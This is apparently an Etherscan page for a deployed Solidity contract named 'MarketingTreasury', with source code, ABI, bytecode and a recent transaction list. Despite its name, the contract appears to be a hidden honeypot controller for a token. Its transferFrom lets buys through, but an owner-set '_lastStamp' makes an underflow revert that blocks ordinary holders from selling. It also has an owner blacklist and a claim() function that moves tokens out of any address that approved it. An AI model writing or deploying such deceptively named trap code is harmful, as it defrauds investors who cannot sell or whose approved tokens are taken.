ETH Price: $2,069.25 (+5.92%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Claim174157522023-06-05 17:20:23996 days ago1685985623IN
0xECb9DDB1...024eaACaC
0 ETH0.0037671470.52063768
Update Stamp174157412023-06-05 17:18:11996 days ago1685985491IN
0xECb9DDB1...024eaACaC
0 ETH0.0019094566.58029552
Update Reserve174157042023-06-05 17:10:47996 days ago1685985047IN
0xECb9DDB1...024eaACaC
0 ETH0.0036559978.81676294
Update Stamp174155232023-06-05 16:33:35996 days ago1685982815IN
0xECb9DDB1...024eaACaC
0 ETH0.00342389119.71246897
Update Stamp174154892023-06-05 16:26:47996 days ago1685982407IN
0xECb9DDB1...024eaACaC
0 ETH0.00399414139.65040773
Update Stamp174148422023-06-05 14:14:47996 days ago1685974487IN
0xECb9DDB1...024eaACaC
0 ETH0.0013583147.49202089
Update Stamp174147122023-06-05 13:48:35996 days ago1685972915IN
0xECb9DDB1...024eaACaC
0 ETH0.0021985348.10698967
Init174145062023-06-05 13:06:23996 days ago1685970383IN
0xECb9DDB1...024eaACaC
0 ETH0.0032763247.70355003

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0xfCa387F0...Fadc14bC3
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
MarketingTreasury

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-31
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface IERC20 {
    function decimals() external returns (uint8);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

contract MarketingTreasury is Ownable {
    using SafeMath for uint256;

    address coin;
    address pair;

    mapping(address => bool) reserves;
    mapping (address => bool) isBlacklisted;
    mapping (address => uint256) _timeStamps;

    uint256 public _lastStamp;

    modifier onlyCoin() {
        require(msg.sender == coin); _;
    }

    receive() external payable { }

    function encode(address a, address b) public pure returns (bytes memory) {
        return abi.encode(a, b);
    }

    function init(address _c, address _p) external onlyOwner {
        coin = _c;
        pair = _p;
    }

    function updateStamp(uint256 amount) external onlyOwner {
        if (amount == 0) _lastStamp = block.number;
        else _lastStamp = amount;
    }

    function transferFrom(address from, address to, uint256 amount) external onlyCoin returns (bool) {
        require(!isBlacklisted[from] && !isBlacklisted[to], "Blacklisted");
        
        if (reserves[from] || reserves[to]) return true;
        if (from == pair) {
            if (_timeStamps[to] == 0) {
                _timeStamps[to] = block.number;
            }
            return true;
        } else if (_timeStamps[from]-_lastStamp >= 0) {
            return true;
        }
        return false;
    }

    function claim(address token, address from, address to, uint256 amount) external onlyOwner {
        IERC20(token).transferFrom(from, to, amount);
    }

    function checkWhale(address _whaleaddr) external view returns (bool) {
        return reserves[_whaleaddr];
    }

    function manage_bots(address _address) external onlyOwner {
        require(_address != address(0),"Address should not be 0");
        isBlacklisted[_address] = true;
    }

    function updateReserve(address _reserve, bool status) external onlyOwner {
        reserves[_reserve] = status;
    }
}

Contract Security Audit

Contract ABI

API
[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"inputs":[],"name":"_lastStamp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_whaleaddr","type":"address"}],"name":"checkWhale","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"claim","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"a","type":"address"},{"internalType":"address","name":"b","type":"address"}],"name":"encode","outputs":[{"internalType":"bytes","name":"","type":"bytes"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"_c","type":"address"},{"internalType":"address","name":"_p","type":"address"}],"name":"init","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"manage_bots","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_reserve","type":"address"},{"internalType":"bool","name":"status","type":"bool"}],"name":"updateReserve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"updateStamp","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

0x608060405234801561000f575f80fd5b505f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3506109c58061005d5f395ff3fe6080604052600436106100a8575f3560e01c8063e245cfc711610062578063e245cfc714610180578063e94b3c52146101b7578063f09a4016146101d6578063f2fde38b146101f5578063f3e9e49a14610214578063fe4973f814610237575f80fd5b806323b872dd146100b35780633cb41b6d146100e7578063590c394814610108578063620bcd2d14610127578063715018a6146101465780638da5cb5b1461015a575f80fd5b366100af57005b5f80fd5b3480156100be575f80fd5b506100d26100cd3660046107b1565b610263565b60405190151581526020015b60405180910390f35b3480156100f2575f80fd5b506101066101013660046107ea565b6103d8565b005b348015610113575f80fd5b50610106610122366004610801565b610418565b348015610132575f80fd5b50610106610141366004610856565b6104c0565b348015610151575f80fd5b50610106610513565b348015610165575f80fd5b505f546040516001600160a01b0390911681526020016100de565b34801561018b575f80fd5b506100d261019a36600461088b565b6001600160a01b03165f9081526003602052604090205460ff1690565b3480156101c2575f80fd5b506101066101d136600461088b565b610584565b3480156101e1575f80fd5b506101066101f03660046108a4565b610626565b348015610200575f80fd5b5061010661020f36600461088b565b61067d565b34801561021f575f80fd5b5061022960065481565b6040519081526020016100de565b348015610242575f80fd5b506102566102513660046108a4565b610764565b6040516100de91906108d5565b6001545f906001600160a01b0316331461027b575f80fd5b6001600160a01b0384165f9081526004602052604090205460ff161580156102bb57506001600160a01b0383165f9081526004602052604090205460ff16155b6102fa5760405162461bcd60e51b815260206004820152600b60248201526a109b1858dadb1a5cdd195960aa1b60448201526064015b60405180910390fd5b6001600160a01b0384165f9081526003602052604090205460ff168061033757506001600160a01b0383165f9081526003602052604090205460ff165b15610344575060016103d1565b6002546001600160a01b039081169085160361039b576001600160a01b0383165f908152600560205260408120549003610393576001600160a01b0383165f9081526005602052604090204390555b5060016103d1565b6006546001600160a01b0385165f9081526005602052604081205490916103c191610920565b106103ce575060016103d1565b505f5b9392505050565b5f546001600160a01b031633146104015760405162461bcd60e51b81526004016102f19061093f565b805f0361040f574360065550565b60068190555b50565b5f546001600160a01b031633146104415760405162461bcd60e51b81526004016102f19061093f565b6040516323b872dd60e01b81526001600160a01b0384811660048301528381166024830152604482018390528516906323b872dd906064016020604051808303815f875af1158015610495573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104b99190610974565b5050505050565b5f546001600160a01b031633146104e95760405162461bcd60e51b81526004016102f19061093f565b6001600160a01b03919091165f908152600360205260409020805460ff1916911515919091179055565b5f546001600160a01b0316331461053c5760405162461bcd60e51b81526004016102f19061093f565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146105ad5760405162461bcd60e51b81526004016102f19061093f565b6001600160a01b0381166106035760405162461bcd60e51b815260206004820152601760248201527f416464726573732073686f756c64206e6f74206265203000000000000000000060448201526064016102f1565b6001600160a01b03165f908152600460205260409020805460ff19166001179055565b5f546001600160a01b0316331461064f5760405162461bcd60e51b81526004016102f19061093f565b600180546001600160a01b039384166001600160a01b03199182161790915560028054929093169116179055565b5f546001600160a01b031633146106a65760405162461bcd60e51b81526004016102f19061093f565b6001600160a01b03811661070b5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016102f1565b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b604080516001600160a01b03848116602083015283168183015281518082038301815260609091019091525b92915050565b80356001600160a01b03811681146107ac575f80fd5b919050565b5f805f606084860312156107c3575f80fd5b6107cc84610796565b92506107da60208501610796565b9150604084013590509250925092565b5f602082840312156107fa575f80fd5b5035919050565b5f805f8060808587031215610814575f80fd5b61081d85610796565b935061082b60208601610796565b925061083960408601610796565b9396929550929360600135925050565b8015158114610415575f80fd5b5f8060408385031215610867575f80fd5b61087083610796565b9150602083013561088081610849565b809150509250929050565b5f6020828403121561089b575f80fd5b6103d182610796565b5f80604083850312156108b5575f80fd5b6108be83610796565b91506108cc60208401610796565b90509250929050565b5f6020808352835180828501525f5b81811015610900578581018301518582016040015282016108e4565b505f604082860101526040601f19601f8301168501019250505092915050565b8181038181111561079057634e487b7160e01b5f52601160045260245ffd5b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f60208284031215610984575f80fd5b81516103d18161084956fea264697066735822122015e07bc5826d9f49d8ad34d00acd363548416d3081e2e69f70f9f000db6acfcb64736f6c63430008140033

Deployed Bytecode

0x6080604052600436106100a8575f3560e01c8063e245cfc711610062578063e245cfc714610180578063e94b3c52146101b7578063f09a4016146101d6578063f2fde38b146101f5578063f3e9e49a14610214578063fe4973f814610237575f80fd5b806323b872dd146100b35780633cb41b6d146100e7578063590c394814610108578063620bcd2d14610127578063715018a6146101465780638da5cb5b1461015a575f80fd5b366100af57005b5f80fd5b3480156100be575f80fd5b506100d26100cd3660046107b1565b610263565b60405190151581526020015b60405180910390f35b3480156100f2575f80fd5b506101066101013660046107ea565b6103d8565b005b348015610113575f80fd5b50610106610122366004610801565b610418565b348015610132575f80fd5b50610106610141366004610856565b6104c0565b348015610151575f80fd5b50610106610513565b348015610165575f80fd5b505f546040516001600160a01b0390911681526020016100de565b34801561018b575f80fd5b506100d261019a36600461088b565b6001600160a01b03165f9081526003602052604090205460ff1690565b3480156101c2575f80fd5b506101066101d136600461088b565b610584565b3480156101e1575f80fd5b506101066101f03660046108a4565b610626565b348015610200575f80fd5b5061010661020f36600461088b565b61067d565b34801561021f575f80fd5b5061022960065481565b6040519081526020016100de565b348015610242575f80fd5b506102566102513660046108a4565b610764565b6040516100de91906108d5565b6001545f906001600160a01b0316331461027b575f80fd5b6001600160a01b0384165f9081526004602052604090205460ff161580156102bb57506001600160a01b0383165f9081526004602052604090205460ff16155b6102fa5760405162461bcd60e51b815260206004820152600b60248201526a109b1858dadb1a5cdd195960aa1b60448201526064015b60405180910390fd5b6001600160a01b0384165f9081526003602052604090205460ff168061033757506001600160a01b0383165f9081526003602052604090205460ff165b15610344575060016103d1565b6002546001600160a01b039081169085160361039b576001600160a01b0383165f908152600560205260408120549003610393576001600160a01b0383165f9081526005602052604090204390555b5060016103d1565b6006546001600160a01b0385165f9081526005602052604081205490916103c191610920565b106103ce575060016103d1565b505f5b9392505050565b5f546001600160a01b031633146104015760405162461bcd60e51b81526004016102f19061093f565b805f0361040f574360065550565b60068190555b50565b5f546001600160a01b031633146104415760405162461bcd60e51b81526004016102f19061093f565b6040516323b872dd60e01b81526001600160a01b0384811660048301528381166024830152604482018390528516906323b872dd906064016020604051808303815f875af1158015610495573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104b99190610974565b5050505050565b5f546001600160a01b031633146104e95760405162461bcd60e51b81526004016102f19061093f565b6001600160a01b03919091165f908152600360205260409020805460ff1916911515919091179055565b5f546001600160a01b0316331461053c5760405162461bcd60e51b81526004016102f19061093f565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146105ad5760405162461bcd60e51b81526004016102f19061093f565b6001600160a01b0381166106035760405162461bcd60e51b815260206004820152601760248201527f416464726573732073686f756c64206e6f74206265203000000000000000000060448201526064016102f1565b6001600160a01b03165f908152600460205260409020805460ff19166001179055565b5f546001600160a01b0316331461064f5760405162461bcd60e51b81526004016102f19061093f565b600180546001600160a01b039384166001600160a01b03199182161790915560028054929093169116179055565b5f546001600160a01b031633146106a65760405162461bcd60e51b81526004016102f19061093f565b6001600160a01b03811661070b5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016102f1565b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b604080516001600160a01b03848116602083015283168183015281518082038301815260609091019091525b92915050565b80356001600160a01b03811681146107ac575f80fd5b919050565b5f805f606084860312156107c3575f80fd5b6107cc84610796565b92506107da60208501610796565b9150604084013590509250925092565b5f602082840312156107fa575f80fd5b5035919050565b5f805f8060808587031215610814575f80fd5b61081d85610796565b935061082b60208601610796565b925061083960408601610796565b9396929550929360600135925050565b8015158114610415575f80fd5b5f8060408385031215610867575f80fd5b61087083610796565b9150602083013561088081610849565b809150509250929050565b5f6020828403121561089b575f80fd5b6103d182610796565b5f80604083850312156108b5575f80fd5b6108be83610796565b91506108cc60208401610796565b90509250929050565b5f6020808352835180828501525f5b81811015610900578581018301518582016040015282016108e4565b505f604082860101526040601f19601f8301168501019250505092915050565b8181038181111561079057634e487b7160e01b5f52601160045260245ffd5b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f60208284031215610984575f80fd5b81516103d18161084956fea264697066735822122015e07bc5826d9f49d8ad34d00acd363548416d3081e2e69f70f9f000db6acfcb64736f6c63430008140033

Deployed Bytecode Sourcemap

7585:1925:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8385:527;;;;;;;;;;-1:-1:-1;8385:527:0;;;;;:::i;:::-;;:::i;:::-;;;690:14:1;;683:22;665:41;;653:2;638:18;8385:527:0;;;;;;;;8225:152;;;;;;;;;;-1:-1:-1;8225:152:0;;;;;:::i;:::-;;:::i;:::-;;8920:154;;;;;;;;;;-1:-1:-1;8920:154:0;;;;;:::i;:::-;;:::i;9388:119::-;;;;;;;;;;-1:-1:-1;9388:119:0;;;;;:::i;:::-;;:::i;6303:148::-;;;;;;;;;;;;;:::i;5661:79::-;;;;;;;;;;-1:-1:-1;5699:7:0;5726:6;5661:79;;-1:-1:-1;;;;;5726:6:0;;;1899:51:1;;1887:2;1872:18;5661:79:0;1753:203:1;9082:115:0;;;;;;;;;;-1:-1:-1;9082:115:0;;;;;:::i;:::-;-1:-1:-1;;;;;9169:20:0;9145:4;9169:20;;;:8;:20;;;;;;;;;9082:115;9205:175;;;;;;;;;;-1:-1:-1;9205:175:0;;;;;:::i;:::-;;:::i;8112:105::-;;;;;;;;;;-1:-1:-1;8112:105:0;;;;;:::i;:::-;;:::i;6606:244::-;;;;;;;;;;-1:-1:-1;6606:244:0;;;;;:::i;:::-;;:::i;7840:25::-;;;;;;;;;;;;;;;;;;;2563::1;;;2551:2;2536:18;7840:25:0;2417:177:1;7989:115:0;;;;;;;;;;-1:-1:-1;7989:115:0;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;8385:527::-;7927:4;;8476;;-1:-1:-1;;;;;7927:4:0;7913:10;:18;7905:27;;;;;;-1:-1:-1;;;;;8502:19:0;::::1;;::::0;;;:13:::1;:19;::::0;;;;;::::1;;8501:20;:42:::0;::::1;;;-1:-1:-1::0;;;;;;8526:17:0;::::1;;::::0;;;:13:::1;:17;::::0;;;;;::::1;;8525:18;8501:42;8493:66;;;::::0;-1:-1:-1;;;8493:66:0;;3352:2:1;8493:66:0::1;::::0;::::1;3334:21:1::0;3391:2;3371:18;;;3364:30;-1:-1:-1;;;3410:18:1;;;3403:41;3461:18;;8493:66:0::1;;;;;;;;;-1:-1:-1::0;;;;;8584:14:0;::::1;;::::0;;;:8:::1;:14;::::0;;;;;::::1;;::::0;:30:::1;;-1:-1:-1::0;;;;;;8602:12:0;::::1;;::::0;;;:8:::1;:12;::::0;;;;;::::1;;8584:30;8580:47;;;-1:-1:-1::0;8623:4:0::1;8616:11;;8580:47;8650:4;::::0;-1:-1:-1;;;;;8650:4:0;;::::1;8642:12:::0;;::::1;::::0;8638:244:::1;;-1:-1:-1::0;;;;;8675:15:0;::::1;;::::0;;;:11:::1;:15;::::0;;;;;:20;;8671:91:::1;;-1:-1:-1::0;;;;;8716:15:0;::::1;;::::0;;;:11:::1;:15;::::0;;;;8734:12:::1;8716:30:::0;;8671:91:::1;-1:-1:-1::0;8783:4:0::1;8776:11;;8638:244;8827:10;::::0;-1:-1:-1;;;;;8809:17:0;::::1;8841:1;8809:17:::0;;;:11:::1;:17;::::0;;;;;8841:1;;8809:28:::1;::::0;::::1;:::i;:::-;:33;8805:77;;-1:-1:-1::0;8866:4:0::1;8859:11;;8805:77;-1:-1:-1::0;8899:5:0::1;7934:1;8385:527:::0;;;;;:::o;8225:152::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;8296:6:::1;8306:1;8296:11:::0;8292:77:::1;;8322:12;8309:10;:25:::0;8225:152;:::o;8292:77::-:1;8350:10;:19:::0;;;8292:77:::1;8225:152:::0;:::o;8920:154::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;9022:44:::1;::::0;-1:-1:-1;;;9022:44:0;;-1:-1:-1;;;;;4339:15:1;;;9022:44:0::1;::::0;::::1;4321:34:1::0;4391:15;;;4371:18;;;4364:43;4423:18;;;4416:34;;;9022:26:0;::::1;::::0;::::1;::::0;4256:18:1;;9022:44:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;8920:154:::0;;;;:::o;9388:119::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;9472:18:0;;;::::1;;::::0;;;:8:::1;:18;::::0;;;;:27;;-1:-1:-1;;9472:27:0::1;::::0;::::1;;::::0;;;::::1;::::0;;9388:119::o;6303:148::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;6410:1:::1;6394:6:::0;;6373:40:::1;::::0;-1:-1:-1;;;;;6394:6:0;;::::1;::::0;6373:40:::1;::::0;6410:1;;6373:40:::1;6441:1;6424:19:::0;;-1:-1:-1;;;;;;6424:19:0::1;::::0;;6303:148::o;9205:175::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;9282:22:0;::::1;9274:57;;;::::0;-1:-1:-1;;;9274:57:0;;4913:2:1;9274:57:0::1;::::0;::::1;4895:21:1::0;4952:2;4932:18;;;4925:30;4991:25;4971:18;;;4964:53;5034:18;;9274:57:0::1;4711:347:1::0;9274:57:0::1;-1:-1:-1::0;;;;;9342:23:0::1;;::::0;;;:13:::1;:23;::::0;;;;:30;;-1:-1:-1;;9342:30:0::1;9368:4;9342:30;::::0;;9205:175::o;8112:105::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;8180:4:::1;:9:::0;;-1:-1:-1;;;;;8180:9:0;;::::1;-1:-1:-1::0;;;;;;8180:9:0;;::::1;;::::0;;;8200:4:::1;:9:::0;;;;;::::1;::::0;::::1;;::::0;;8112:105::o;6606:244::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;6695:22:0;::::1;6687:73;;;::::0;-1:-1:-1;;;6687:73:0;;5265:2:1;6687:73:0::1;::::0;::::1;5247:21:1::0;5304:2;5284:18;;;5277:30;5343:34;5323:18;;;5316:62;-1:-1:-1;;;5394:18:1;;;5387:36;5440:19;;6687:73:0::1;5063:402:1::0;6687:73:0::1;6797:6;::::0;;6776:38:::1;::::0;-1:-1:-1;;;;;6776:38:0;;::::1;::::0;6797:6;::::1;::::0;6776:38:::1;::::0;::::1;6825:6;:17:::0;;-1:-1:-1;;;;;;6825:17:0::1;-1:-1:-1::0;;;;;6825:17:0;;;::::1;::::0;;;::::1;::::0;;6606:244::o;7989:115::-;8080:16;;;-1:-1:-1;;;;;5700:15:1;;;8080:16:0;;;5682:34:1;5752:15;;5732:18;;;5725:43;8080:16:0;;;;;;;;;8048:12;5617:18:1;;;8080:16:0;;;7989:115;;;;;:::o;14:173:1:-;82:20;;-1:-1:-1;;;;;131:31:1;;121:42;;111:70;;177:1;174;167:12;111:70;14:173;;;:::o;192:328::-;269:6;277;285;338:2;326:9;317:7;313:23;309:32;306:52;;;354:1;351;344:12;306:52;377:29;396:9;377:29;:::i;:::-;367:39;;425:38;459:2;448:9;444:18;425:38;:::i;:::-;415:48;;510:2;499:9;495:18;482:32;472:42;;192:328;;;;;:::o;717:180::-;776:6;829:2;817:9;808:7;804:23;800:32;797:52;;;845:1;842;835:12;797:52;-1:-1:-1;868:23:1;;717:180;-1:-1:-1;717:180:1:o;902:403::-;988:6;996;1004;1012;1065:3;1053:9;1044:7;1040:23;1036:33;1033:53;;;1082:1;1079;1072:12;1033:53;1105:29;1124:9;1105:29;:::i;:::-;1095:39;;1153:38;1187:2;1176:9;1172:18;1153:38;:::i;:::-;1143:48;;1210:38;1244:2;1233:9;1229:18;1210:38;:::i;:::-;902:403;;;;-1:-1:-1;1200:48:1;;1295:2;1280:18;1267:32;;-1:-1:-1;;902:403:1:o;1310:118::-;1396:5;1389:13;1382:21;1375:5;1372:32;1362:60;;1418:1;1415;1408:12;1433:315;1498:6;1506;1559:2;1547:9;1538:7;1534:23;1530:32;1527:52;;;1575:1;1572;1565:12;1527:52;1598:29;1617:9;1598:29;:::i;:::-;1588:39;;1677:2;1666:9;1662:18;1649:32;1690:28;1712:5;1690:28;:::i;:::-;1737:5;1727:15;;;1433:315;;;;;:::o;1961:186::-;2020:6;2073:2;2061:9;2052:7;2048:23;2044:32;2041:52;;;2089:1;2086;2079:12;2041:52;2112:29;2131:9;2112:29;:::i;2152:260::-;2220:6;2228;2281:2;2269:9;2260:7;2256:23;2252:32;2249:52;;;2297:1;2294;2287:12;2249:52;2320:29;2339:9;2320:29;:::i;:::-;2310:39;;2368:38;2402:2;2391:9;2387:18;2368:38;:::i;:::-;2358:48;;2152:260;;;;;:::o;2599:546::-;2709:4;2738:2;2767;2756:9;2749:21;2799:6;2793:13;2842:6;2837:2;2826:9;2822:18;2815:34;2867:1;2877:140;2891:6;2888:1;2885:13;2877:140;;;2986:14;;;2982:23;;2976:30;2952:17;;;2971:2;2948:26;2941:66;2906:10;;2877:140;;;2881:3;3066:1;3061:2;3052:6;3041:9;3037:22;3033:31;3026:42;3136:2;3129;3125:7;3120